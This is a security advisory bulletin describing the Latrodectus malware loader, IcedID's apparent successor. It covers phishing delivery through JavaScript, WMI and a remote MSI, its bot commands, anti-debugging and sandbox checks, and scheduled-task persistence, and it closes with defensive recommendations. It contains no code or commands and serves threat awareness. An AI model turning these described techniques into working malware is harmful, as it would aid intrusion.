Latrodectus Malware Loader Emerges as IcedID's Successor in Phishing Campaigns

Researchers at Elastic Security Labs have observed an uptick in email campaigns since early March of 2024, delivering Latrodectus malware. Latrodectus is a malware loader that was identified in October of 2023 by Walmart researchers and is believed to be a successor of the IcedID malware. Since its upbringing, Latrodectus has gained popularity within the cybercriminal community, given that it offers a range of capabilities to deploy other payloads and conduct various activities after initial compromise. In total Latrodectus supports 11 different commands, two of which are newly added, designed to retrieve processes and list files from the desktop directory. Notably, one of the command handlers supported by Latrodectus is designed to download and execute IcedID malware loader. Although this command has not been observed being utilized in attacks, researchers suspect that Latrodectus is being actively developed as a replacement for IcedID and that the handler is included until authors are satisfied with Latrodectus’ capabilities.

Security Officer Comments:
In the latest campaign, Latrodectus is being distributed in spam emails containing large JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a malicious MSI file from a remote WebDav share, designed to deploy the final payload, which in this case is Latrodectus. Latrodectus operates as a bot as its core functionality is driven through its command handlers. Once executed, Latrodectus establish communication with the C2 server via HTTPs to receive commands that allow it to collect system information; update, restart, and terminate itself; and run shellcode, DLL, and executable files. According to Elastic Security Labs, Latrodectus is capable of performing several anti-analysis checks including monitoring for a debugger by looking for the BeingDebugged flag inside the Process Environment Block (PEB) as well as performing validation checks to avoid sandboxes or virtual machines that may have a low number of active processes. Latrodectus also maintains persistence on targeted systems by setting up scheduled tasks via the Windows Component Object Model (COM).

Suggested Corrections:
Given phishing is the primary distribution vector for malware loaders like Latrodectus, organizations should be on the lookout for emails from unknown senders containing malicious links and attachments. Regular table top exercises can help increase employee awareness and preparedness to deter potential attacks.

Elastic Security Labs has published a set of IOCs and YARA rules for detection purposes which can be accessed using the link below: